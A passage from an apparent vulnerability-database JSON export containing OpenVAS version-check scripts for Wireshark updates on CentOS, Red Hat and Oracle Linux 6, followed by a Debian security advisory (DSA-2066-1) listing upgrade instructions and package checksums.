GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Several flaws were found in Wireshark. If Wireshark read a malformed packet\n off a network or opened a malicious dump file, it could crash or, possibly,\n execute arbitrary code as the user running Wireshark. (CVE-2011-1590,\n CVE-2011-4102, CVE-2012-1595)\n \n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\n CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\n CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n \n Users of Wireshark should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running instances of\n Wireshark must be restarted for the update to take effect.\";\n\ntag_affected = \"wireshark on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018591.html\");\n script_id(881173);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:44 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\",\n \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\",\n \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\",\n \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0509\");\n script_name(\"CentOS Update for wireshark CESA-2012:0509 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:58:12", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for wireshark RHSA-2012:0509-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:870606", "href": "http://plugins.openvas.org/nasl.php?oid=870606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2012:0509-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Several flaws were found in Wireshark. If Wireshark read a malformed packet\n off a network or opened a malicious dump file, it could crash or, possibly,\n execute arbitrary code as the user running Wireshark. (CVE-2011-1590,\n CVE-2011-4102, CVE-2012-1595)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\n CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\n CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running instances of\n Wireshark must be restarted for the update to take effect.\";\n\ntag_affected = \"wireshark on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00016.html\");\n script_id(870606);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:33:13 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\",\n \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\",\n \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\",\n \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0509-01\");\n script_name(\"RedHat Update for wireshark RHSA-2012:0509-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.2.15~2.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:11", "description": "Oracle Linux Local Security Checks ELSA-2012-0509", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0509", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123932", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123932", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0509.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123932\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:28 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0509\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0509 - wireshark security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0509\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0509.html\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\", \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.2.15~2.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.2.15~2.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for wireshark RHSA-2012:0509-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2012:0509-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00016.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870606\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:33:13 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\",\n \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\",\n \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\",\n \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"RHSA\", value:\"2012:0509-01\");\n script_name(\"RedHat Update for wireshark RHSA-2012:0509-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"wireshark on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Several flaws were found in Wireshark. If Wireshark read a malformed packet\n off a network or opened a malicious dump file, it could crash or, possibly,\n execute arbitrary code as the user running Wireshark. (CVE-2011-1590,\n CVE-2011-4102, CVE-2012-1595)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\n CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\n CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running instances of\n Wireshark must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.2.15~2.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-10-22T00:33:46", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2066-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 01, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : wireshark\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-2283 CVE-2010-2284 CVE-2010-2285 CVE-2010-2286 CVE-2010-2287\n\nSeveral remote vulnerabilities have been discovered in the Wireshark\nnetwork traffic analyzer. It was discovered that null pointer\ndereferences, buffer overflows and infinite loops in the SMB, SMB\nPIPE, ASN1.1 and SigComp dissectors could lead to denial of service\nor the execution of arbitrary code.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.0.2-3+lenny9.\n\nFor the upcoming stable distribution (squeeze) and the unstable \ndistribution (sid), these problems have been fixed in version \n1.2.9-1.\n\nWe recommend that you upgrade your wireshark packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9.diff.gz\n Size/MD5 checksum: 117318 c57282dba42788631eb9b2aafcb795b9\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2.orig.tar.gz\n Size/MD5 checksum: 16935492 1834437f7c6dbed02082e7757133047d\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9.dsc\n Size/MD5 checksum: 1502 0e98ce69fc13ab36557c65c07b4b75ba\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_alpha.deb\n Size/MD5 checksum: 569930 cfa45c83e5c9c44920e7aefc02953806\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_alpha.deb\n Size/MD5 checksum: 731110 e311e7e59bc6e610e8168036a5690de0\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_alpha.deb\n Size/MD5 checksum: 12097910 56e87a8f98c6226ad760fed96a49da02\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_alpha.deb\n Size/MD5 checksum: 126986 eac9483ae6b2788128ed22939aaa2065\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_amd64.deb\n Size/MD5 checksum: 659816 6fac5122d24f4941f15a9ad73498b639\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_amd64.deb\n Size/MD5 checksum: 582426 0a20dce55ed1f2d1ebd7ce85c56c9cec\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_amd64.deb\n Size/MD5 checksum: 11866064 9056a2c4b1de908c83a2eee224bb4c5a\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_amd64.deb\n Size/MD5 checksum: 118542 b91639fd75d0f01f0b635d2906466fa7\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_arm.deb\n Size/MD5 checksum: 10214918 247e1109f87d9eef35014125b5c0d684\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_arm.deb\n Size/MD5 checksum: 111240 509b7ad83c455e51502e421671190f08\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_arm.deb\n Size/MD5 checksum: 614378 e61a1effec42a968416f55eb39184d34\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_arm.deb\n Size/MD5 checksum: 584478 a8f8d82419846731c5a9143a0e42df74\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_armel.deb\n Size/MD5 checksum: 620384 e61474b8f78057891851e809470416c1\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_armel.deb\n Size/MD5 checksum: 583854 0bb327530c4e5ec401a5074d03c19108\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_armel.deb\n Size/MD5 checksum: 10219204 474007b931f7f7c8a516bde4ad166b39\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_armel.deb\n Size/MD5 checksum: 113084 2bbf09b9deaa7be1e04390cdad71e8dc\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_hppa.deb\n Size/MD5 checksum: 584110 b2a9a17505cf8e53d3a94ff3a483995c\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_hppa.deb\n Size/MD5 checksum: 694798 e9d0705311d2a1797c10f1035a05f116\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_hppa.deb\n Size/MD5 checksum: 121114 c30b842eb86c1af2440714dc86a383a5\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_hppa.deb\n Size/MD5 checksum: 13272482 2dfafdb7cf34a776fd6ec90adcd8a3a8\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_i386.deb\n Size/MD5 checksum: 10113068 09efb0fca5f46ba65beee175b934ba13\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_i386.deb\n Size/MD5 checksum: 111900 c46f23005c23bdcb7ca95bd8f4d57efd\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_i386.deb\n Size/MD5 checksum: 569932 e2201aaa7f040869e4ac6878781ad4dc\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_i386.deb\n Size/MD5 checksum: 619470 dbba8e61a068df42a854b765189fee43\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_ia64.deb\n Size/MD5 checksum: 13687486 606d272c4f0abbb1e9f983595d8b9c81\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_ia64.deb\n Size/MD5 checksum: 569910 4e3071a28cfbcd5cbe1a3be145cb66ec\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_ia64.deb\n Size/MD5 checksum: 930118 859a8f3701e985ebfbeb2dfbfb15c348\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_ia64.deb\n Size/MD5 checksum: 154074 284194d7a3ffeaa3b64c55eecddad25d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_mips.deb\n Size/MD5 checksum: 637126 c9fd33097e71f8538744cfe81796dc37\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_mips.deb\n Size/MD5 checksum: 584124 235c303d91ced163d2bdb4783ed1c1b0\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_mips.deb\n Size/MD5 checksum: 113080 5d83644584a5dd00cf7c9f1d6f2c5bd7\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_mips.deb\n Size/MD5 checksum: 10423592 e5bedaac3c39ba6ab485f6cdafe2430f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_mipsel.deb\n Size/MD5 checksum: 627100 a53c5133cec97a7020884c6fe5c1f30e\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_mipsel.deb\n Size/MD5 checksum: 9729878 e0c65c8bc125f0613e6d68125813d5bb\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_mipsel.deb\n Size/MD5 checksum: 569970 d4d5c23b486bd3699d01ea8fa2f95e99\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_mipsel.deb\n Size/MD5 checksum: 113396 23b6778041b23721b0819bf9042b70bb\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_powerpc.deb\n Size/MD5 checksum: 584576 b31cb071b70d16de97ad4e9211cc9442\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_powerpc.deb\n Size/MD5 checksum: 677432 6ecabe572aa78465c7bf298be6d534d4\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_powerpc.deb\n Size/MD5 checksum: 123124 523f75e5f1cb8685bbc0475a939a9b0c\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_powerpc.deb\n Size/MD5 checksum: 11228652 99688c83a5951441f09c4f8b0a6f3c20\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_s390.deb\n Size/MD5 checksum: 122294 2a42d6fedac978f4ddaebf5a1ec35b92\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_s390.deb\n Size/MD5 checksum: 671216 f04ef7a93b80c097edf2c55b11843521\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_s390.deb\n Size/MD5 checksum: 584780 73c011dc1581e92c2a4a12a8d8b4b70c\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_s390.deb\n Size/MD5 checksum: 12487580 0ba627e0d6df4bdc3422618a6450c2d1\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny9_sparc.deb\n Size/MD5 checksum: 113460 d1b06ded2ea44e26d44ab7424bb1f174\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny9_sparc.deb\n Size/MD5 checksum: 583604 3a4187d54fb747638bdfbeeffb9d2418\n http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny9_sparc.deb\n Size/MD5 checksum: 11286898 4fcc47f9836da934431dce9840a50278\n 